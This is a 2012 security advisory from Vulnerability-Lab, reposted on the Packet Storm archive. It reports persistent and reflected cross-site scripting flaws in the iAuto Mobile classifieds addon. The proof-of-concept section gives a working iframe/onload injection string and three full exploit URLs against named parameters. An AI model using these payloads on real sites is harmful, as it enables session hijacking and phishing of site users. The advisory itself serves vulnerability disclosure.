exploit the possibilities

iAuto Mobile Application 2012 Cross Site Scripting

iAuto Mobile Application 2012 Cross Site Scripting
Posted Aug 7, 2012
Authored by Benjamin Kunz Mejri | Site vulnerability-lab.com

iAuto Mobile Application 2012 suffers from multiple cross site scripting vulnerabilities.

tags | exploit, vulnerability, xss
MD5 | aefa8ae5d10f47614153515ed22a7b8d

iAuto Mobile Application 2012 Cross Site Scripting

Change Mirror Download
Title:
======
iAuto Mobile Application 2012 - Multiple Web Vulnerabilities


Date:
=====
2012-07-11


References:
===========
http://www.vulnerability-lab.com/get_content.php?id=658


VL-ID:
=====
658


Common Vulnerability Scoring System:
====================================
3.5


Introduction:
=============
With Internet on mobile devices booming, having a desktop-oriented version is just not enough anymore. Empower your
visitors with content designed for mobile Web by offering them a mobile version of your classifieds website.
WorksForWeb is offering custom-made mobile frontend addons for our classified solutions. The mobile version of your
website will present all the data of the regular website in the format optimized for iPhone, Android, iPad, BlackBerry,
Symbian, or other mobile devices. Mobile frontend addon features:

Quick and advanced search,
Browsing,
Tabbed design,
Multi-language interface,
Google Maps,
And much more

Addon is seamlessly integrated with your main website. Your website automatically detects mobile browsers to redirect
mobile visitors to the mobile-optimized content. Why do you need a mobile gateway to your website? Because all the market
leaders have mobile access, and so should you. The mobile technology is redefining our future, and you should be one step
ahead of your smaller competitors. Mobile users now make up a large percentage of your target audience, and their needs
to access information easily are important to address. At this moment, the mobile addon is compatible with classified
solutions of v.5.2 and above. The price of the mobile frontend addon is only $175. This price includes a free expert
installation on your server.

(Copy of the Vendor Homepage: http://www.worksforweb.com/classifieds-software/addons/mobile-addon/ )


Abstract:
=========
The Vulnerability Laboratory Research Team discovered multiple cross site vulnerabilities in the iAuto Mobile APP for Android, iOS & Blackberry.


Report-Timeline:
================
2012-07-10: Public or Non-Public Disclosure


Status:
========
Published


Exploitation-Technique:
=======================
Remote


Severity:
=========
Medium


Details:
========
1.1
A persistent input validation vulnerability is detected in the iAuto Mobile APP for Android, iOS (iPhone), Ericsson & Blackberry.
The bugs allow remote attackers to implement/inject malicious script code on the application side (persistent). The persistent vulnerability
is located in comments module with the bound vulnerable commentSid parameter. Successful exploitation of the vulnerability can lead to session
hijacking (manager/admin) or stable (persistent) context manipulation. Exploitation requires low user inter action & privileged user account.

Vulnerable Module(s):
[+] Comments > Reply to The Comment Listing

Vulnerable Parameter(s):
[+] commentSid & commentInfo


1.2
Multiple non persistent cross site scripting vulnerabilities are detected in the iAuto Mobile APP for Android, iOS (iPhone), Ericsson & Blackberry.
The vulnerability allows remote attackers to hijack website customer, moderator or admin sessions with medium or high required user inter action or
local low privileged user account. The bugs are located in the Dealer > Search Sellers or Browse by Make and Model with the bound vulnerable
parameters city & path/url. Successful exploitation can result in account steal, client side phishing & client-side content request manipulation.
Exploitation requires medium or high user inter action & without privileged web application user account.


Vulnerable Module(s):
[+] Dealer > Search Sellers > City
[+] Browse by Make and Model > /../ >

Vulnerable Parameter(s):
[+] City
[+] Folder Access Listing


Proof of Concept:
=================
1.1
The persistent vulnerabilities can be exploited by remote attackers with low privileged user account and with low required user inter action.
For demonstration or reproduce ...


Review: Add Comments - Listing

<div class="addComment">
<h1>Reply to The Comment</h1>
<div class="pageDescription">
<div class="commentInfo">You are replying to the comment
#"><iframe src="iAuto%20%20%20Listing%20Comments%20Reply%20to%20The%20Comment-Dateien/[PERSISTENT INJECTED CODE!])' <="" to=""
listing="" #448="" "<span="" class="fieldValue fieldValueYear" height="900" width="1000">2007</span>
<span class="fieldValue fieldValueMake">Acura</span>



1.2
The client side cross site scripting vulnerabilities can be exploited by remote attackers with medium or highr equired user inter action.
Fo demonstration or reproduce ...

String: "><iframe src=http://vuln-lab.com width=1000 height=900 onload=alert("VulnerabilityLab") <

Dealer > Search Sellers > City

PoC:
http://iauto.xxx.com/iAuto/m/users/search/?DealershipName[equal]=jamaikan-hope23&City[equal]=%22%3E%3Ciframe+src%3Dhttp%3A%2F%2Fvuln-lab.com+
width%3D1000+height%3D900+onload%3Dalert%28%22VulnerabilityLab%22%29+%3C&State[equal]=11&action=search


Browse by Make and Model / AC Cobra / >

PoC:
http://iauto.xxx.com/iAuto/m/browse-by-make-model/AC+Cobra/%22%3E%3Ciframe%20src=http://vuln-lab.com%20
width=1000%20height=900%20onload=alert%28%22VulnerabilityLab%22%29%20%3C/


Comments > Reply to The Comment > Topic & Text (commentSid)

PoC:
http://iauto.xxx.com/iAuto/m/comment/add/?listingSid=448&commentSid=%22%3E%3Ciframe%20src=http://vuln-lab.com%20width=1000
%20height=900%20onload=alert%28%22VulnerabilityLab%22%29%20%3C&returnBackUri=%2Flisting%2Fcomments%2F448%2F%3F



Risk:
=====
1.1
The security risk of the persistent input validation vulnerability is estimated as medium(+).

1.2
The security risk of the non-persistent cross site scripting vulnerabilities are estimated as low(+)|(-)medium.


Credits:
========
Vulnerability Laboratory [Research Team] - Benjamin Kunz Mejri (bkm@vulnerability-lab.com)


Disclaimer:
===========
The information provided in this advisory is provided as it is without any warranty. Vulnerability-Lab disclaims all warranties,
either expressed or implied, including the warranties of merchantability and capability for a particular purpose. Vulnerability-
Lab or its suppliers are not liable in any case of damage, including direct, indirect, incidental, consequential loss of business
profits or special damages, even if Vulnerability-Lab or its suppliers have been advised of the possibility of such damages. Some
states do not allow the exclusion or limitation of liability for consequential or incidental damages so the foregoing limitation
may not apply. We do not approve or encourage anybody to break any vendor licenses, policies, deface websites, hack into databases
or trade with fraud/stolen material.

Domains: www.vulnerability-lab.com - www.vuln-lab.com - www.vulnerability-lab.com/register
Contact: admin@vulnerability-lab.com - support@vulnerability-lab.com - research@vulnerability-lab.com
Section: video.vulnerability-lab.com - forum.vulnerability-lab.com - news.vulnerability-lab.com
Social: twitter.com/#!/vuln_lab - facebook.com/VulnerabilityLab - youtube.com/user/vulnerability0lab
Feeds: vulnerability-lab.com/rss/rss.php - vulnerability-lab.com/rss/rss_upcoming.php - vulnerability-lab.com/rss/rss_news.php

Any modified copy or reproduction, including partially usages, of this file requires authorization from Vulnerability Laboratory.
Permission to electronically redistribute this alert in its unmodified form is granted. All other rights, including the use of other
media, are reserved by Vulnerability-Lab Research Team or its suppliers. All pictures, texts, advisories, sourcecode, videos and
other information on this website is trademark of vulnerability-lab team & the specific authors or managers. To record, list (feed),
modify, use or edit our material contact (admin@vulnerability-lab.com or support@vulnerability-lab.com) to get a permission.

Copyright © 2012 | Vulnerability Laboratory



--
VULNERABILITY RESEARCH LABORATORY
LABORATORY RESEARCH TEAM
CONTACT: research@vulnerability-lab.com

Comments

RSS Feed Subscribe to this comment feed

No comments yet, be the first!

Login or Register to post a comment

File Archive:

July 2019

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Jul 1st
    34 Files
  • 2
    Jul 2nd
    15 Files
  • 3
    Jul 3rd
    9 Files
  • 4
    Jul 4th
    8 Files
  • 5
    Jul 5th
    2 Files
  • 6
    Jul 6th
    3 Files
  • 7
    Jul 7th
    1 Files
  • 8
    Jul 8th
    15 Files
  • 9
    Jul 9th
    15 Files
  • 10
    Jul 10th
    20 Files
  • 11
    Jul 11th
    17 Files
  • 12
    Jul 12th
    15 Files
  • 13
    Jul 13th
    2 Files
  • 14
    Jul 14th
    1 Files
  • 15
    Jul 15th
    20 Files
  • 16
    Jul 16th
    0 Files
  • 17
    Jul 17th
    0 Files
  • 18
    Jul 18th
    0 Files
  • 19
    Jul 19th
    0 Files
  • 20
    Jul 20th
    0 Files
  • 21
    Jul 21st
    0 Files
  • 22
    Jul 22nd
    0 Files
  • 23
    Jul 23rd
    0 Files
  • 24
    Jul 24th
    0 Files
  • 25
    Jul 25th
    0 Files
  • 26
    Jul 26th
    0 Files
  • 27
    Jul 27th
    0 Files
  • 28
    Jul 28th
    0 Files
  • 29
    Jul 29th
    0 Files
  • 30
    Jul 30th
    0 Files
  • 31
    Jul 31st
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2019 Packet Storm. All rights reserved.

Services
Security Services
Hosting By
Rokasec
close